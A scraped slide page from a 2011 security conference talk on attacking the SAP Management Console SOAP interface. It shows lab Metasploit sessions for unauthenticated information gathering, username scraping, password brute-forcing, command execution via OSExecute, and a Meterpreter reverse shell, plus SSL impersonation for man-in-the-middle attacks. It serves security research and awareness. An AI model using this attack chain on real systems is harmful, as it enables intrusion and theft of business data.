Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort webhostingguy
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort webhostingguy
 
Prog1 chap1 and chap 2
Prog1 chap1 and chap 2Prog1 chap1 and chap 2
Prog1 chap1 and chap 2rowensCap
 
php & performance
php & performance php & performance
php & performance
simon8410
 
Being HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeBeing HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on Purpose
Aman Kohli
 
Presentation iv implementasi 802x eap tls peap mscha pv2
Presentation iv implementasi 802x eap tls peap mscha pv2Presentation iv implementasi 802x eap tls peap mscha pv2
Presentation iv implementasi 802x eap tls peap mscha pv2Hell19
 
SharePoint 2010 Virtualisation - SharePoint Saturday UK
SharePoint 2010 Virtualisation - SharePoint Saturday UKSharePoint 2010 Virtualisation - SharePoint Saturday UK
SharePoint 2010 Virtualisation - SharePoint Saturday UKMichael Noel
 
The Enterprise Wor/d/thy/Press
The Enterprise Wor/d/thy/PressThe Enterprise Wor/d/thy/Press
The Enterprise Wor/d/thy/Press
Jeroen van Dijk
 
Leveraging Open Source to Manage SAN Performance
Leveraging Open Source to Manage SAN PerformanceLeveraging Open Source to Manage SAN Performance
Leveraging Open Source to Manage SAN Performance
brettallison
 

Similar to SecZone 2011: Scrubbing SAP clean with SOAP (20)

The Art of Grey-Box Attack
The Art of Grey-Box AttackThe Art of Grey-Box Attack
The Art of Grey-Box Attack
 
Atmosphere Conference 2015: Taming the Modern Datacenter
Atmosphere Conference 2015: Taming the Modern DatacenterAtmosphere Conference 2015: Taming the Modern Datacenter
Atmosphere Conference 2015: Taming the Modern Datacenter
 
sap basis transaction codes
sap basis transaction codessap basis transaction codes
sap basis transaction codes
 
Sap basis administrator user guide
Sap basis administrator user guideSap basis administrator user guide
Sap basis administrator user guide
 
SharePoint 2010 Virtualization - SharePoint Saturday L.A.
SharePoint 2010 Virtualization - SharePoint Saturday L.A.SharePoint 2010 Virtualization - SharePoint Saturday L.A.
SharePoint 2010 Virtualization - SharePoint Saturday L.A.
 
SharePoint 2010 Virtualization - Norway SharePoint User Group
SharePoint 2010 Virtualization - Norway SharePoint User GroupSharePoint 2010 Virtualization - Norway SharePoint User Group
SharePoint 2010 Virtualization - Norway SharePoint User Group
 
점진적인 레거시 웹 애플리케이션 개선 과정
점진적인 레거시 웹 애플리케이션 개선 과정점진적인 레거시 웹 애플리케이션 개선 과정
점진적인 레거시 웹 애플리케이션 개선 과정
 
SaltConf14 - Ben Cane - Using SaltStack in High Availability Environments
SaltConf14 - Ben Cane - Using SaltStack in High Availability EnvironmentsSaltConf14 - Ben Cane - Using SaltStack in High Availability Environments
SaltConf14 - Ben Cane - Using SaltStack in High Availability Environments
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalability
 
Champion Fas Deduplication
Champion Fas DeduplicationChampion Fas Deduplication
Champion Fas Deduplication
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort
 
Intrusion Detection System using Snort
Intrusion Detection System using Snort Intrusion Detection System using Snort
Intrusion Detection System using Snort
 
Prog1 chap1 and chap 2
Prog1 chap1 and chap 2Prog1 chap1 and chap 2
Prog1 chap1 and chap 2
 
php & performance
php & performance php & performance
php & performance
 
Being HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeBeing HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on Purpose
 
Operation outbreak
Operation outbreakOperation outbreak
Operation outbreak
 
Presentation iv implementasi 802x eap tls peap mscha pv2
Presentation iv implementasi 802x eap tls peap mscha pv2Presentation iv implementasi 802x eap tls peap mscha pv2
Presentation iv implementasi 802x eap tls peap mscha pv2
 
SharePoint 2010 Virtualisation - SharePoint Saturday UK
SharePoint 2010 Virtualisation - SharePoint Saturday UKSharePoint 2010 Virtualisation - SharePoint Saturday UK
SharePoint 2010 Virtualisation - SharePoint Saturday UK
 
The Enterprise Wor/d/thy/Press
The Enterprise Wor/d/thy/PressThe Enterprise Wor/d/thy/Press
The Enterprise Wor/d/thy/Press
 
Leveraging Open Source to Manage SAN Performance
Leveraging Open Source to Manage SAN PerformanceLeveraging Open Source to Manage SAN Performance
Leveraging Open Source to Manage SAN Performance
 

Recently uploaded

Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Ramesh Iyer
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Product School
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
OnBoard
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
91mobiles
 
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Product School
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
RTTS
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 
Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*
Frank van Harmelen
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
ThousandEyes
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
Elena Simperl
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
Sri Ambati
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Inflectra
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
Prayukth K V
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Jeffrey Haguewood
 
Connector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonConnector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a button
DianaGray10
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
Product School
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
Safe Software
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
DianaGray10
 

Recently uploaded (20)

Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
 
Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...Designing Great Products: The Power of Design and Leadership by Chief Designe...
Designing Great Products: The Power of Design and Leadership by Chief Designe...
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*
 
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdfFIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
FIDO Alliance Osaka Seminar: The WebAuthn API and Discoverable Credentials.pdf
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
 
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 previewState of ICS and IoT Cyber Threat Landscape Report 2024 preview
State of ICS and IoT Cyber Threat Landscape Report 2024 preview
 
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...
 
Connector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonConnector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a button
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
Essentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with ParametersEssentials of Automations: Optimizing FME Workflows with Parameters
Essentials of Automations: Optimizing FME Workflows with Parameters
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
 

SecZone 2011: Scrubbing SAP clean with SOAP

  • 1. SAP (in)security Scrubbing SAP clean with SOAP Chris John Riley
  • 2.
  • 3. “THE WISEST MAN, IS HE WHO KNOWS, THAT HE KNOWS NOTHING” SOCRATES: APOLOGY, 21D
  • 5.
  • 6.
  • 7. SPANISH IS NOT MY STRONGPOINT
  • 8. NO ME TOQUES AHÍ!
  • 9. 1) What's what 2) Information is king 3) Getting in the middle 4) Putting it all together 5) Stopping Bob!
  • 11.
  • 12.
  • 13. “…the world's leading provider of business software, SAP (which stands for "Systems, Applications, and Products in Data Processing") delivers products and services that help accelerate business innovation for our customers.”
  • 14. Other people describe them as… “…the world's leading repository of business critical information, SAP (which stands for ”Security Ain't [our] Problem") delivers products and services that help attackers gain access to critical enterprise data.”
  • 15. Some rights reserved by TrevinC
  • 16. IS IT REALLY THAT BAD?
  • 17. Some rights reserved by Telstar Logistics
  • 18. Some rights reserved by Telstar Logistics
  • 19. So Many Reasons  Vulnerabilties are a part of it!  Every system has it‘s vulnerabilities  SAP installations often fall to business  Not an operations problem  Financial data should be handled by the business  Security team never gets close to it!
  • 20. “YOU CAN'T TEST THAT, IT'S BUSINESS CRITICAL!” UNKNOWN PROJECT MANAGER
  • 21.
  • 22. You’re getting SOAP all over my SAP! THIS TALK SAP Security Netweaver . SOAP
  • 23. Some rights reserved by Telstar Logistics
  • 25. WRONG KIND OF SOAP!
  • 26. SOAP Request Example (1) POST /InStock HTTP/1.1 .... <?xml version="1.0"?> <soap:Envelope xmlns:soap="http://www.w3.org/2001/12/soap- envelope" soap:encodingStyle="http://www.w3.org/2001/12/so ap-encoding"> <soap:Body>....</soap:Body> </soap:Envelope>
  • 27. SOAP Request Example (1) POST /InStock HTTP/1.1 .... <?xml version="1.0"?> <soap:Envelope xmlns:soap="http://www.w3.org/2001/12/soap- envelope" soap:encodingStyle="http://www.w3.org/2001/12/so ap-encoding"> <soap:Body>....</soap:Body> </soap:Envelope>
  • 28. SOAP Request Example (2) ... <soap:Body xmlns:m="http://test.org/stock"> <m:GetStockPrice> <m:StockName>SAP</m:StockName> </m:GetStockPrice> </soap:Body> ...
  • 29. SOAP Request Example (2) ... <soap:Body xmlns:m="http://test.org/stock"> <m:GetStockPrice> <m:StockName>SAP</m:StockName> </m:GetStockPrice> </soap:Body> ...
  • 30. SOAP Response Example ... <m:GetStockPriceResponse> <m:Price>34.5</m:Price> </m:GetStockPriceResponse> </soap:Body> ...
  • 31. SOAP Response Example ... <m:GetStockPriceResponse> <m:Price>34.5</m:Price> </m:GetStockPriceResponse> </soap:Body> ...
  • 32. A LITTLE BIT ABOUT SAP MANAGEMENT CONSOLE
  • 33. SAP MC Communications  Default port 5<instance>13/14  50013 HTTP  50014 HTTPS  Can use SSL  If it‘s configured  More on this later!
  • 34. SAP MC Communications  Uses Basic auth for some functions  Yes... It‘s 2011  Yes... Companies still use Basic Auth  Most functions don‘t even use that!  Yes... Unauthenticated!
  • 36. ON ALL SAP SYSTEMS!
  • 37. SAP MC MMC Snap-in
  • 38. SAP MC JAVA Applet
  • 40. “If there's one thing SAP MC loves, it's giving away information“ Quote by: Me, just now!
  • 42. Show me the money!
  • 43.
  • 44. Information is king  Version information  Sure, HTTP headers give that!  Nothing new here... mostly  Down to the patch-level  Can you say “targeted attack“
  • 45. Version Information msf auxiliary(sap_mgmt_con_version) > show options Module options (auxiliary/scanner/sap/sap_mgmt_con_version): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no Use a proxy chain RHOSTS 172.16.15.128 yes The target address range RPORT 50013 yes The target port THREADS 1 yes The number of threads URI / no Path to the SAP MC VHOST no HTTP server virtual host
  • 46. Version Information msf auxiliary(sap_mgmt_con_version) > show options Module options (auxiliary/scanner/sap/sap_mgmt_con_version): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no Use a proxy chain RHOSTS 172.16.15.128 yes The target address range RPORT 50013 yes The target port THREADS 1 yes The number of threads URI / no Path to the SAP MC VHOST no HTTP server virtual host
  • 47. Version Information msf auxiliary(sap_mgmt_con_version) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Version Number Extracted - 172.16.15.128:50013 [+] [SAP] Version: 720, patch 70, changelist 1203517, optU, NTintel [+] [SAP] SID: NSP [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
  • 48. Version Information msf auxiliary(sap_mgmt_con_version) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Version Number Extracted - 172.16.15.128:50013 [+] [SAP] Version: 720, patch 70, changelist 1203517, optU, NTintel [+] [SAP] SID: NSP [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
  • 49. Information is king  Startup profile  Instance name  SAP System Name  SAP SID  SAP DB Schema  Paths  ....
  • 50. Startup Profile msf auxiliary(sap_mgmt_con_startprofile) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Startup Profile Extracted: WINXPSAP- TSTsapmntNSPSYSprofileSTART_DVEBMGS00_WINXPSAP -TST [*] SAPSYSTEMNAME = NSP [*] SAPGLOBALHOST = WINXPSAP-TST [*] SAPSYSTEM = 00 [*] INSTANCE_NAME = DVEBMGS00 [*] DIR_PROFILE = WINXPSAP-TSTsapmntNSPSYSprofile [*] _PF = $(DIR_PROFILE)NSP_DVEBMGS00_WINXPSAP-TST [*] dbs/ada/schema = SAPNSP
  • 51. Startup Profile msf auxiliary(sap_mgmt_con_startprofile) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Startup Profile Extracted: WINXPSAP- TSTsapmntNSPSYSprofileSTART_DVEBMGS00_WINXPSAP -TST [*] SAPSYSTEMNAME = NSP [*] SAPGLOBALHOST = WINXPSAP-TST [*] SAPSYSTEM = 00 [*] INSTANCE_NAME = DVEBMGS00 [*] DIR_PROFILE = WINXPSAP-TSTsapmntNSPSYSprofile [*] _PF = $(DIR_PROFILE)NSP_DVEBMGS00_WINXPSAP-TST [*] dbs/ada/schema = SAPNSP
  • 52. Information is king  Server / Instance Environment  Computername  OS Service userame  Database Names  Database Type (Oracle, MaxDB, ...)  Full Server Environment Variable list!  Information overload  OMG why!
  • 53. Environment msf auxiliary(sap_mgmt_con_getenv) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [*] COMPUTERNAME=WINXPSAP-TST [*] ComSpec=C:WINDOWSsystem32cmd.exe [*] DBMS_TYPE=ada [*] FP_NO_HOST_CHECK=NO [*] OS=Windows_NT [*] USERNAME=SAPServiceNSP [*] PSModulePath=C:windowssystem32PowerShell... [*] SAPEXE=E:usrsapNSPSYSexeucNTI386 [*] TMP=E:usrsapNSPtmp
  • 54. Environment msf auxiliary(sap_mgmt_con_getenv) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [*] COMPUTERNAME=WINXPSAP-TST [*] ComSpec=C:WINDOWSsystem32cmd.exe [*] DBMS_TYPE=ada [*] FP_NO_HOST_CHECK=NO [*] OS=Windows_NT Operating System User [*] USERNAME=SAPServiceNSP [*] PSModulePath=C:windowssystem32PowerShell... [*] SAPEXE=E:usrsapNSPSYSexeucNTI386 [*] TMP=E:usrsapNSPtmp
  • 55. Information is king  SAP Log/Tracefiles  SAP Startup Logs  Error / Debug Logs  Developer Traces  Security Logs  SAP ABAPSysLog  SAP Startup Times  PIDs  Services + Status Info
  • 56. Log/Trace Files msf auxiliary(sap_mgmt_con_listlogfiles) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface Filename Size Timestamp -------- ---- --------- available.log 2268 2011 10 16 12:52:33 dev_cp 4397 2011 04 19 10:30:48 dev_disp 4612 2011 10 14 15:06:14 dev_icm 6594 2011 10 14 15:07:38 sapstart.log 629 2011 10 14 15:06:04 sapstartsrv.log 754 2011 10 16 10:04:36 stderr1 903 2011 10 14 15:06:04
  • 57. Log/Trace Files <SAPControl:ReadDeveloperTraceResponse> <name>E:usrsapNSPDVEBMGS00workdev_w0<name> <item>trc file: "dev_w0", trc level: 1, release: "720"</item> <item>---------------------------------------------------</item> <item>* ACTIVE TRACE LEVEL 1</item> <item>M pid 3564</item> <item>M DpSysAdmExtCreate: ABAP is active</item> <item>M DpShMCreate: allocated sys_adm at 09A40048</item> <item>M DpShMCreate: allocated wp_adm at 09A43020</item> <item>M DpShMCreate: allocated tm_adm at 09A47E48</item> …
  • 58. ABAP Log File <SAPControl:ABAPReadSyslogResponse><log> <item><Time>2011 10 14 15:06:18</Time> <Text>SAP: ICM started on host WINXPSAP-TST (PID: 3536) </Text><Severity>SAPControl-GREEN</Severity> <item><Time>2011 10 14 15:06:12</Time> <Text>SAP Basis: Active ICU Version 3.4; Compiled With ICU 3.4; Unicode Version 4.1 </Text><Severity>SAPControl-GREEN</Severity></item> …
  • 59. Information is king  Extracting data from logfiles  Logfiles include usernames  Scrape for SAP usernames  Instant brute-force user list!  Just an example of the data availble
  • 60. Extract SAP Users [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Users Extracted: 10 entries extracted [+] [SAP] Extracted User: SAPSYS [+] [SAP] Extracted User: TEST1 [+] [SAP] Extracted User: TESTDEV [+] [SAP] Extracted User: ADMIN1 [+] [SAP] Extracted User: SADM [+] [SAP] Extracted User: TEST2 …
  • 61. Extract SAP Users [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Users Extracted: 10 entries extracted [+] [SAP] Extracted User: SAPSYS SAP USERS [+] [SAP] Extracted User: TEST1 [+] [SAP] Extracted User: TESTDEV [+] [SAP] Extracted User: ADMIN1 [+] [SAP] Extracted User: SADM [+] [SAP] Extracted User: TEST2 …
  • 62. Information is king  Process Parameters  Output of the entire SAP configuration  Password Policies  Setup your Brute-force just right ;)  Hash Types  Still supporting those old 8 char hashes?  Security Audit Log Enabled ?  rsau/enabled (default: 0)  Is anybody watching?
  • 63. Process Parameters msf auxiliary(sap_mgmt_con_getprocessparameter) > run [*] [SAP] Connecting to SAP MC on 172.16.15.128:50013 [*] [SAP] Attempting to matche (?i-mx:^login/password) [SAP] Process Parameters Name Value ------ ---------- login/password_charset 1 login/password_downwards_compatibility 1 login/password_hash_algorithm encoding=RFC2307, algorithm=iSSHA-1, saltsize=96 login/password_max_idle_productive 0
  • 64. Process Parameters msf auxiliary(sap_mgmt_con_getprocessparameter) > run [*] [SAP] Connecting to SAP MC on 172.16.15.128:50013 [*] [SAP] Attempting to matche (?i-mx:^login/password) [SAP] Process Parameters Name Value ------ ---------- login/password_charset 1 login/password_downwards_compatibility 1 login/password_hash_algorithm encoding=RFC2307, algorithm=iSSHA-1, saltsize=96 login/password_max_idle_productive 0
  • 65. Process Parameters <SAPControl:GetProcessParameterResponse><parameter> <item><name>DIR_AUDIT</name> <group>System</group> <description>Directory for security audit files</description> <unit/><value>E:usrsapNSPDVEBMGS00log</value></item> <item><name>login/fails_to_user_lock</name> <group>Login</group> <description>Number of invalid login attempts until user lock</description> <unit/><value> 5 </value></item> …
  • 66. Process Parameters <SAPControl:GetProcessParameterResponse><parameter> <item><name>DIR_AUDIT</name> <group>System</group> <description>Directory for security audit files</description> <unit/><value>E:usrsapNSPDVEBMGS00log</value></item> <item><name>login/fails_to_user_lock</name> <group>Login</group> <description>Number of invalid login attempts until user lock</description> <unit/><value> 5 </value></item> …
  • 67. Information is king  Useful Process Parameters  rsau/enabled  login/password_downward_compatibility  login/failed_user_auto_unlock  login/fails_to_user_lock  login/min_password_lng  login/password_charset  .... *Checkout consolut.com for a great list
  • 68. “I put a whitebox configuration audit in your blackbox penetration test, so you can whitebox SAP while you blackbox it!“ Quote by: Me, just now!
  • 70. ALL THE FUNCTIONS SO FAR ARE UNAUTHENTICATED
  • 71.
  • 72. BUT IT'S OK!
  • 79.
  • 80. 2,700 Number of SAP servers 2,675 listening on public addresses 2,650 2,625 2,600 2,575 2,550 2,525 2,500 Router Gateway SAP MC SAP MC (SSL)
  • 81.
  • 82. Some rights reserved by Crystl
  • 84. Basic auth is your friend!
  • 86. MAN IN THE MIDDLE…
  • 87. LET ME COUNT THE WAYS…
  • 88.
  • 89. Getting in the middle  Force Authentication  Basic Auth == Clear Text  Credentials FTW!  Alter Requests  Do what YOU want  Alter Responses
  • 92.
  • 93. SSL PROTECTION 4 MAJOR OPTIONS
  • 94. Getting in the middle Self Signed
  • 95. Getting in the middle Device Default  Often the same on EVERY device  Not an option for SAP
  • 96. Getting in the middle Enterprise CA  You sign your own certs centrally  PKI Infrastructure
  • 97. Getting in the middle Externally signed  Diginotar to the rescue!  SAP also offer signing services
  • 98. Getting in the middle  Impersonate SSL  There‘s a module for that!  Metasploit (ssl_impersonate.rb)  Creates a fake cert  As close to the original as possible  Useful SE options  Expired yesterday  Add CN names for ease of use
  • 99. Getting in the middle As near as darn a clone of the original Fingerprints + Serial Number differ
  • 100. Getting in the middle All CN data is 100% cloned… Average users don’t care!
  • 101.
  • 102. PUTTING IT ALL TOGETHER
  • 103.
  • 104. OSExecute  SAP MC generously offers OSExecute function  Valid username/password req.  That‘s handy!
  • 106. MITM  Using the force-auth method  Check under the keyboard  Post-it notes!  Rubber hose method
  • 107. Brute-Force  Metasploit module  Set SAP SID for SAP specific checks  Watchout for lockouts!  Denial of Service?
  • 108. Brute Force msf auxiliary(sap_mgmt_con_brute_login) > set SAP_SID NSP msf auxiliary(sap_mgmt_con_brute_login) > run [*] SAPSID set to 'NSP' - Setting default SAP wordlist [*] Trying username:'sapservicensp' password:'' [-] [01/18] - failed to login as 'sapservicensp' password: '' [*] Trying username:'sapservicensp' password:'sapserviceNSP’ [-] [02/18] - failed to login as 'sapadm' password: '' [*] Trying username:'nspadm' password:'' …
  • 109. OSExecute auxiliary(sap_..._osexec) > set RHOSTS 172.16.15.128 auxiliary(sap_..._osexec) > set USERNAME sapservicensp auxiliary(sap_..._osexec) > set PASSWORD Pr0d@dm1n auxiliary(sap_..._osexec) > set CMD hostname auxiliary(sap_..._osexec) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Command run as PID: 1240 Command output -------------- WINXPSAP-TST
  • 110. THANKS, BUT WE WANT FULL ACCESS!
  • 111. Getting Meterpreter  Using tricks built into Metasploit  Encode Payload  Split it up into chucks  Shove it in  Start it up!  Profit
  • 112.
  • 113. OSExecute Meterpreter msf exploit(sap_mgmt_con_osexec_exploit) > exploit [*] Started reverse handler on 172.16.15.134:4444 [*] Command Stager - 7.42% done (7499/101079 bytes) ... [*] Command Stager - 100.00% done (101079/101079 bytes) [*] Meterpreter session 1 opened (172.16.15.134:4444 -> 172.16.15.128:1144) at 2011-10-16 14:41:59 +0200 meterpreter > getuid Server username: WINXPSAP-TSTSAPServiceNSP
  • 114.
  • 116.
  • 117. WHY IS YOUR SAP MC ACCESSIBLE TO THE WORLD!
  • 119. Fixing the issues  SAP Fix  Note 1439348  Issue also discovered by Onapsis  No idea what it says!  SAP restrict ALL fix info to customers only
  • 120. SAP SECURITY ISN’T ALL ABOUT ROLED
  • 124. CLIENT-SIDE APPS
  • 125. SAP IS COMPLEX TEST IT!
  • 126. Questions ? http://c22.cc contact@c22.cc
  • 127. Big Thanks  The REAL SAP Security Researchers  Onapsis, DSecRG, Raul Siles, CYBSEC  SAP PSRT (for emailing me a lot)  DirtySec (You know who you are!)  MacLemon (for the PPT-fu)  ED  For inviting us, even though we cause problems!  All the people who helped make this happen
